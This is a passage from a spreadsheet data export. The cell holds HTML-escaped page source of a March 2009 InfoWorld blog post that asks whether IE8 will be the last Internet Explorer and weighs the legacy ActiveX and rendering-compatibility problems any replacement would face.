	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/stratdev/"&gt;Heller: Strategic Developer&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/"&gt;Kennedy: Enterprise Desktop&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/lewis/"&gt;Lewis: Advice Line&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/fatalexception/"&gt;McAllister: Fatal Exception&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/openresource/"&gt;Rodrigues &amp; Urlocker: Open Sources&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/sustainableit/"&gt;Samson: Sustainable IT&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/realitycheck/"&gt;Schwartz: Reality Check&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/gripeline/"&gt;Tynan-Wood: Gripe Line&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/venezia/"&gt;Venezia: The Deep End&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href="http://weblog.infoworld.com/whurley/"&gt;whurley: Cloud Computing&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="http://weblog.infoworld.com/yager/"&gt;Yager: Ahead of the Curve&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/"&gt;All InfoWorld Blogs&lt;/a&gt;&lt;/li&gt;
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;a href="http://www.infoworld.com/video/index.html"&gt;AUDIO/VIDEO&lt;/a&gt;
		&lt;ul&gt;
			&lt;li&gt;&lt;a href="http://www.infoworld.com/video/index.html"&gt;Video&lt;/a&gt;&lt;/li&gt;
		    &lt;li&gt;&lt;a href="http://www.infoworld.com/ad/adv_wc.html"&gt;Webcasts&lt;/a&gt;&lt;/li&gt;
		    &lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=o"&gt;Slideshows&lt;/a&gt;&lt;/li&gt;
			&lt;li class="third"&gt;&lt;a href="http://www.infoworld.com/weblog/podcasts/new_podcasts_index.html"&gt;Podcasts&lt;/a&gt;
				&lt;ul&gt;
					&lt;li&gt;&lt;a href="http://weblog.infoworld.com/daily/archives/podcast/"&gt;InfoWorld Daily&lt;/a&gt;&lt;/li&gt;
					&lt;li&gt;&lt;a href="http://weblog.infoworld.com/realworldsoa/archives/podcast/"&gt;Real World SOA&lt;/a&gt;&lt;/li&gt;
					&lt;li&gt;&lt;a href="http://weblog.infoworld.com/smbit/archives/podcast/"&gt;SMB IT&lt;/a&gt;&lt;/li&gt;
					&lt;li&gt;&lt;a href="http://weblog.infoworld.com/thestoragenetwork/archives/podcast/"&gt;The Storage Network&lt;/a&gt;&lt;/li&gt;
					&lt;li&gt;&lt;a href="http://weblog.infoworld.com/virtualization/archives/podcast/"&gt;Virtualization Report&lt;/a&gt;&lt;/li&gt;
				&lt;/ul&gt;
			&lt;/li&gt;			
		&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;a href="http://www.infoworld.com/event/"&gt;EVENTS&amp;nbsp;&amp;nbsp;&lt;/a&gt;
		&lt;ul&gt;
			&lt;li class="third"&gt;
				&lt;a href="http://www.infoworld.com/event/"&gt;Virtual Conferences&lt;/a&gt;
				&lt;ul&gt;
					&lt;!--&lt;li&gt;
						&lt;a href="http://vts.inxpo.com/scripts/InXpo.nxp?LASCmd=AI:4;F:QS!10100&amp;ShowKey=1418"&gt;Cloud Computing&lt;/a&gt;
					&lt;/li&gt;--&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/enterprise_architecture/index.html"&gt;Enterprise Architecture&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/security_directions/index.html"&gt;Security Directions&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/virtualization_directions/index.html"&gt;Virtualization Directions&lt;/a&gt;
					&lt;/li&gt;
				&lt;/ul&gt;
			&lt;/li&gt;
			&lt;li class="third"&gt;
				&lt;a href="http://www.infoworld.com/event/new_economics/"&gt;New Economics of IT&lt;/a&gt;
				&lt;ul&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/event/new_economics/2009_0318_miami.html"&gt;Miami, FL&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/event/new_economics/2009_0422_dallas.html"&gt;Dallas, TX&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/event/new_economics/2009_0512_chicago.html"&gt;Chicago, IL&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/event/new_economics/2009_0603_dc.html"&gt;Washington, DC&lt;/a&gt;
					&lt;/li&gt;
					&lt;li&gt;
						&lt;a href="http://www.infoworld.com/event/new_economics/"&gt;See all events&lt;/a&gt;
					&lt;/li&gt;
				&lt;/ul&gt;
			&lt;/li&gt;
			&lt;li&gt;
				&lt;a href="http://www.infoworld.com/event/osbc/09/index.html"&gt;OSBC&amp;nbsp;&amp;nbsp;&lt;/a&gt;
			&lt;/li&gt;
			&lt;li&gt;
				&lt;a href="http://www.infoworld.com/event/virtualization/index.html"&gt;Virtualization Executive Forum&lt;/a&gt;
			&lt;/li&gt;
			&lt;li&gt;
		    	&lt;a href="http://www.infoworld.com/events/"&gt;Complete Events Calendar&lt;/a&gt;
		    &lt;/li&gt;			
			&lt;!-- &lt;li&gt;
				&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/enterprise_architecture/index.html"&gt;Enterprise Architecture Sep 08&lt;/a&gt;
			&lt;/li&gt;
			&lt;li&gt;
				&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/virtualization_directions/index.html"&gt;Virtualization Directions Oct 08&lt;/a&gt;
			&lt;/li&gt;
			&lt;li&gt;
				&lt;a href="http://www.infoworld.com/event/virtualization/index.html"&gt;Virtualization Exec Forum Nov 08&lt;/a&gt;
			&lt;/li&gt;
		    &lt;li&gt;
		    	&lt;a href="http://www.infoworld.com/spotlights/virtual_conferences/security_directions/index.html"&gt;Security Directions Dec 08&lt;/a&gt;
		    &lt;/li&gt;
		    &lt;li&gt;
		    	&lt;a href="http://www.infoworld.com/event/new_economics/"&gt;InfoWorld Technology Summits&lt;/a&gt;
		    &lt;/li&gt;
		    &lt;li&gt;
		    	&lt;a href="http://www.infoworld.com/events/"&gt;Complete Events Calendar&lt;/a&gt;
		    &lt;/li&gt; --&gt;
		&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
	&lt;a href="http://www.infoworld.com/awards/"&gt;AWARDS&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/awards/infoworld-100.html"&gt;InfoWorld 100&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/awards/CTO-25.html"&gt;CTO-25&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/awards/toy.html"&gt;Technology of the Year&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/awards/bossies.html"&gt;Bossies&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/awards/green-15.html"&gt;Green 15&lt;/a&gt;&lt;/li&gt;
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li class="nodrop"&gt;
	&lt;a href="http://subscribe.infoworld.com/cgi-win/ifwd.cgi?m=newsletter"&gt;NEWSLETTERS&lt;/a&gt;
	&lt;/li&gt;
	&lt;li &gt;
	&lt;a href="http://www.infoworld.com/ad/sponsored_resources.html"&gt;RESOURCES&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/ad/sponsored_resources.html"&gt;IT Resource Guides&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/ad/sponsored_resources.html"&gt;Spotlights&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/ad/adv_wc.html"&gt;Webcasts&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/whitepapers/prm_whp.html"&gt;White Papers&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/winsentinel/"&gt;Windows Sentinel&lt;/a&gt;&lt;/li&gt;
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li class="nodrop"&gt;
	&lt;a href="http://itjobs.infoworld.com/"&gt;IT JOBS&lt;/a&gt;
	&lt;/li&gt;
	&lt;li class="last nodrop"&gt;
	&lt;a href="http://www.infoworld.com/rss/index.html"&gt;RSS&lt;/a&gt;
	&lt;/li&gt;
	&lt;/ul&gt;
&lt;/div&gt;&lt;!--end div header-bg--&gt;	
&lt;div class="content"&gt;
	&lt;!-- LEFT COLUMN --&gt;
	&lt;div class="left-box f-left"&gt;
		&lt;div class="lhc_items"&gt;MORE ENTRIES&lt;/div&gt;
		&lt;div class="bloghed"&gt;
			&lt;ul&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Is IE8 the end of the line for Internet Explorer?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/appv_46_too_lit.html"&gt;App-V 4.6: Too little, too late?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/02/windows_7_the_c.html"&gt;Windows 7: The compatibility blame game&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/02/windows_7_cutti.html"&gt;Windows 7: Cutting corners in the rush to market?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/02/would_vdi_pleas.html"&gt;Would VDI please just go away?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/02/windows_7_is_it.html"&gt;Windows 7: Is it so hard to say "we're sorry"?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/02/windows_7_pokin.html"&gt;Windows 7: Poking holes in Vista's UAC umbrella&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/01/appv_medv_and_m.html"&gt;APP-V, MED-V, and missed opportunities&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/01/whither_windows.html"&gt;Whither Windows Vista?&lt;/a&gt;&lt;/li&gt;
									&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/2009/01/windows_7_beta.html"&gt;Windows 7 beta: Unresolved problems&lt;/a&gt;&lt;/li&gt;
			&lt;/ul&gt;
		&lt;/div&gt;
		&lt;div class="ad" align="center"&gt;
			&lt;!-- begin ad tag  (160x600) --&gt;
&lt;SCRIPT LANGUAGE="JavaScript"&gt;
	adCall("160","600","skyscraper");
&lt;/SCRIPT&gt;
&lt;NOSCRIPT&gt;
  &lt;A HREF="http://ad.doubleclick.net/jump/idg.us.info.general/noscript;pos=skyscraper;tile=12;sz=160x600;ord=123456789?" TARGET="_blank"&gt;
  &lt;IMG SRC="http://ad.doubleclick.net/ad/idg.us.info.general/noscript;pos=skyscraper;tile=12;sz=160x600;ord=123456789?" WIDTH="160" HEIGHT="600" BORDER="0" ALT=""&gt;&lt;/A&gt;
&lt;/NOSCRIPT&gt;
&lt;!-- End ad tag --&gt;
		&lt;/div&gt;
	&lt;/div&gt;&lt;!--end div left-box f-left--&gt;
	&lt;div class="right f-right"&gt;
		&lt;!-- MIDDLE COLUMN --&gt;
		&lt;div class="sub-left f-left"&gt;
			&lt;!-- SEARCH REFERRAL BOX --&gt;
			&lt;div id="oneClickTop"&gt;
&lt;/div&gt;
			&lt;!-- HEADER / TOP TOOL KITS --&gt;
			&lt;div&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/"&gt;&lt;img src="/enterprisedesktop/header.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
			&lt;div class="blogoptions"&gt;			&lt;ul&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/rss.xml"&gt;&lt;img src="http://www.infoworld.com/img/blog/rss.gif" border="0" alt="RSS subscription" align="absmiddle"&gt;&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop/rss.xml"&gt;Subscribe&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=emailThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://images.infoworld.com/img/email.gif" alt="E-mail" border="0" align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=emailThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Email&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=printThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://images.infoworld.com/img/print.gif" alt="Print This" border="0"  align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=printThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Print&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
				&lt;li&gt;&lt;a href="/enterprisedesktop/about.html"&gt;Read Randall's Bio
&lt;/a&gt;&lt;/li&gt;
				&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
				&lt;li&gt;&lt;a href="mailto:randall_kennedy&amp;#64;infoworld&amp;#46;com" class="realsmall"&gt;Contact Randall Kennedy&lt;/a&gt;
&lt;/li&gt;
				&lt;/ul&gt;
			&lt;/div&gt;&lt;!--end div blogoptions--&gt;			
			&lt;div class="yellow"&gt;
                                &lt;!-- BC Player--&gt;
				&lt;!-- BREADCRUMBS --&gt;
				&lt;a href="http://weblog.infoworld.com/enterprisedesktop/" class="breadcrumb"&gt;Enterprise Desktop | Randall C. Kennedy&amp;nbsp;&amp;raquo;&lt;/a&gt; 
				Is IE8 the end of the line for Internet Explorer?
				&lt;!-- JS KIT --&gt;
				&lt;p&gt;
					March 10, 2009&amp;nbsp;|&amp;nbsp;&lt;a href="#postAComment"&gt;Comments:&amp;nbsp;(&lt;span class="js-kit-comments-count" path="/enterprisedesktop/21160"&gt;0&lt;/span&gt;)&lt;/a&gt;
					&lt;div class="js-kit-rating" view="combo" permalink="http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html" freeze="yes" style="width: 110px; float:right; *margin-top: 10px; padding: 30px 0px 20px 20px; background-image: url(http://www.infoworld.com/img/blog/current_rating.gif);"&gt;&lt;/div&gt;
					&lt;!-- BLOG HEADLINE --&gt;
					&lt;h1 class="dek"&gt;Is IE8 the end of the line for Internet Explorer?&lt;/h1&gt;
                    &lt;!--  Dek  --&gt;
                    &lt;h2 class="dek2"&gt;Dropping IE in favor of a newer rendering engine may be not be as easy as it seems&lt;/h2&gt;
					&lt;!-- TAGS / RELATED CONTENTS --&gt;
					&lt;p class="breadcrumb"&gt;
						TAGS: &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/cloud_computing/index.html?source=Cloud Computing"&gt;Cloud Computing&lt;/a&gt;, &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/microsoft/index.html?source=Microsoft"&gt;Microsoft&lt;/a&gt;, &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/productivity/index.html?source=Productivity"&gt;Productivity&lt;/a&gt;, &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/windows_7/index.html?source=Windows 7"&gt;Windows 7&lt;/a&gt;, &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/windows_vista/index.html?source=Windows Vista"&gt;Windows Vista&lt;/a&gt;, &lt;a href="http://weblog.infoworld.com/enterprisedesktop/archives/windows_xp/index.html?source=Windows XP"&gt;Windows XP&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
				&lt;!-- BLOG BODY --&gt;
				&lt;div class="post"&gt;
				&lt;p&gt;IE8 is the last version of the Internet Explorer Web browser. At least, that's what I'm hearing through the grapevine. It seems that Microsoft is preparing to throw in the towel on its Internet Explorer engine once and for all.&lt;/p&gt;
&lt;p&gt;And just what will be its replacement? I’m getting conflicting stories on that one. Some are still claiming that &lt;a href="http://www.appleinsider.com/articles/08/11/06/microsofts_ballmer_considers_using_webkit_within_ie.html" target="_blank"&gt;Microsoft will go with WebKit&lt;/a&gt;, which, thanks to the popularity of Apple's Safari browser and also Google's Chrome, is rapidly becoming a de facto standard for all non-IE and non-Firefox implementations.&lt;/p&gt;
&lt;p&gt;Others insist that that the whole WebKit story is merely a feint and that Microsoft will in fact be adopting a &lt;a href="http://www.jcxp.net/news.php?newsid=2650" target="_blank"&gt;brand-new engine&lt;/a&gt; coming out of its Microsoft Research division. Dubbed &lt;a href="http://weblog.infoworld.com/fatalexception/archives/2009/02/gazelle_the_bro.html"&gt;"Gazelle,"&lt;/a&gt; this new engine will supposedly be more secure than Firefox or even Chrome, making copious use of sandboxing to keep its myriad plug-ins isolated and the overall browser process model protected.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;[ Get the &lt;a href="http://weblog.infoworld.com/fatalexception/archives/2009/02/gazelle_the_bro.html?source=fssr"&gt;full scoop on the Gazelle browser technology&lt;/a&gt; that may replace Internet Explorer. ]&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;But regardless of which direction Microsoft takes -- WebKit or Gazelle -- it will still have to navigate the treacherous waters of legacy ActiveX support. And as someone who has spent some not-so-quality time developing ActiveX controls in the past, the need to maintain some sort of compatibility layer within any proposed IE replacement is a critical consideration.&lt;/p&gt;
&lt;p&gt;For most casual users (i.e., grandma in her den surfing eBay), ActiveX was and is just another annoying &lt;a href="http://www.infoworld.com/article/09/01/02/53TC-ria-rollup_1.html"&gt;RIA (rich Internet application) mechanism&lt;/a&gt;, one that has increasingly been supplanted by Adobe Flash or various AJAX-based mechanisms. However, for enterprise IT shops with a heavy Microsoft investment, ActiveX has long been an integral part of many in-house applications. &lt;/p&gt;
&lt;p&gt;If Microsoft intends to pull the plug on IE after version 8, it will need to articulate a clear legacy migration strategy that allows these shops to preserve their investments in ActiveX controls and resources.&lt;/p&gt;
&lt;p&gt;Then there’s the issue of legacy HTML/CSS support. So much of the Web has been tweaked for IE 6.x compatibility that even Microsoft's own attempts to implement a more standards-compliant browser engine in IE8 have met with disastrous results. For me, the situation so bad that when I do find myself using IE 8 (typically, to view a site that causes my copy of the Chrome 2.x beta release to blow up), I end up configuring IE 8's compatibility mode as the default viewing option since the browser's native rendering mode breaks practically every site I visit.&lt;/p&gt;
&lt;p&gt;Finally, there's the matter of third-party developers using IE's rendering engine with their own applications. A good example would be a program that includes a help file in HTML format and then uses a custom form to display an embedded Web browser object to host the file. This embedded object is invariably an ActiveX container for the IE engine that's installed with Windows, so any attempt to remove IE from the OS -- or to radically change its core underpinnings -- will need to account for applications that rely on the existence of an accessible, programmable IE object model.&lt;/p&gt;
&lt;p&gt;Of course, all of the above is old hat for Microsoft, a company whose status as global software leader too often makes it a victim of its own success. I, for one, look forward to the possibility of a clean break with IE's creaky old rendering engine. But I hope the company pays more care and attention to preserving legacy compatibility than it did with some of its more recent OS efforts.&lt;/p&gt;
				&lt;a name="more"&gt;&lt;/a&gt;
				&lt;p&gt;Posted by Randall C. Kennedy on March 10, 2009 03:00 AM&lt;/p&gt;
				&lt;br  /&gt;                   
				&lt;/div&gt;
				&lt;!-- END BLOG BODY--&gt;
				&lt;!-- RATING WIDGET --&gt;    
				&lt;strong style="float: left;"&gt;RATE THIS ARTICLE:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;
				&lt;div class="js-kit-rating" view="split" style="float: left; margin-top: 15px; padding-left: 130px;" permalink="http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;/div&gt;
				&lt;script src="http://js-kit.com/ratings.js"&gt;&lt;/script&gt;&lt;br  /&gt;&lt;br  /&gt;   
&lt;!-- begin digg it widget --&gt;
                &lt;span class="f-right" style="margin-top: -65px;"&gt;
		&lt;script type="text/javascript"&gt;
		digg_url = 'http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html';
		digg_title = 'Is IE8 the end of the line for Internet Explorer?';
		digg_bodytext = 'Dropping IE in favor of a newer rendering engine may be not be as easy as it seems';
		digg_topic = 'tech_news';
		digg_media = 'news';
		digg_window = 'new';		
		&lt;/script&gt;
		    &lt;script src="http://digg.com/tools/diggthis.js" type="text/javascript"&gt;&lt;/script&gt;                     
                &lt;/span&gt;
                &lt;!-- end digg it widget --&gt;
                    &lt;br  /&gt;&lt;br  /&gt;   
				&lt;!-- BOT TOOL KITS --&gt;
				&lt;div class="lowerblogoptions"&gt;
					&lt;ul&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop//rss.xml"&gt;&lt;img src="http://www.infoworld.com/img/blog/rss.gif" border="0" alt="RSS subscription" align="absmiddle"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/enterprisedesktop//rss.xml"&gt;Subscribe&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=emailThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://images.infoworld.com/img/email.gif" alt="E-mail" border="0" align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=emailThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Email&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=printThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://images.infoworld.com/img/print.gif" alt="Print This" border="0"  align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://weblog.infoworld.com/archives/emailPrint.jsp?R=printThis&amp;A=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Print&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://slashdot.org/submit.pl"&gt;&lt;img src="http://www.infoworld.com/img/icon/sd.gif" align="absmiddle"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://slashdot.org/submit.pl"&gt;Slashdot&lt;/a&gt;&lt;/li&gt;
					&lt;/ul&gt;
					&lt;ul&gt;
						&lt;li&gt;&lt;a href="http://reddit.com/submit?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://www.infoworld.com/img/icon/re.gif" align="absmiddle"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://reddit.com/submit?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;reddit&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://digg.com/submit?phase=2&amp;url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://www.infoworld.com/img/icon/dg.gif" align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://digg.com/submit?phase=2&amp;url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Digg&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://del.icio.us/post?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://www.infoworld.com/img/icon/del.gif" align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://del.icio.us/post?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;De.li.cio.us&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img border=0 src="http://www.infoworld.com/img/blog/stumbleit.gif" alt="StumbleUpon Toolbar"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;Stumble It!&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://www.newsvine.com/_tools/seed&amp;save?u=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;&lt;img src="http://www.infoworld.com/img/icon/nv.gif" align="absmiddle" hspace="3"&gt;&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a href="http://www.newsvine.com/_tools/seed&amp;save?u=http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html"&gt;newsvine&lt;/a&gt;&lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;&lt;!-- end div lowerblogoptions--&gt;
				&lt;div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/div&gt; 
				&lt;!-- comments section --&gt;                  
				&lt;a name="postAComment"&gt;&lt;/a&gt;
				&lt;div class="commented"&gt;
				&lt;center&gt;
				&lt;ul style="text-align: left;"&gt;
				&lt;li&gt;&amp;nbsp;&lt;img src="http://www.infoworld.com/img/blog/lg_arrow.gif" align="absmiddle" /&gt;&lt;/li&gt;
				&lt;li&gt;COMMENTS&lt;/li&gt;
				&lt;/ul&gt;
				&lt;/center&gt;
				&lt;/div&gt;&lt;!--end div commented--&gt;
				&lt;div style="border: 1px solid #CCCCCC; border-top: none; padding: 0px 10px 10px 10px; width: 415px; background: #f8f8f8;"&gt;
				&lt;br /&gt;
				&lt;!-- js kit comments widget --&gt;
				&lt;div class="js-kit-comments" backwards="yes" path="/enterprisedesktop/21160" permalink="http://weblog.infoworld.com/enterprisedesktop/archives/2009/03/is_version_8_th.html" standalone="yes" label="&lt;img src='http://www.infoworld.com/img/blog/btn_postComment.gif' border='0'&gt;" style="display: none"&gt;
				&lt;!-- Template for a single comment entry. This template is optional --&gt;
				&lt;div class="js-singleComment" style="padding: 5px 10px 10px 5px; margin-top: 10px; background: #ffffff;"&gt;
				&lt;br /&gt;
				&lt;!-- Add Avatar --&gt;
				&lt;div class="js-singleCommentAvatar" style="margin-top: -10px; width: 50px; height: 50px;"&gt;&lt;/div&gt;
				&lt;ul class="js-singleCommentINFO" style="float: left; margin: 0px; padding: 0px; list-style-type: none; list-style-image: none; background: #FFFFFF; font-family: helvetica, arial, times new roman; font-size: 12px; color: #000000;"&gt;
				&lt;li class="js-singleCommentName" style="display: inline; padding-left: 10px; padding-bottom: 10px; font-weight: bold;"&gt;{Name}&lt;/li&gt;
				&lt;li class="js-singleCommentDate" style="display: inline; padding-left: 10px; padding-bottom: 10px; font-family: helvetica, arial, times new roman; font-size: 12px; color: #000000;"&gt;{Date}&lt;/li&gt;
				&lt;li class="js-singleCommentDate" style="display: inline; padding-left: 10</t>
        </is>
      </c>
      <c r="X5561" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5562">
      <c r="A5562" t="n">
        <v>293690</v>
      </c>
      <c r="B5562" t="inlineStr">
        <is>
          <t>2005-05-10 16:58:05 -0700</t>
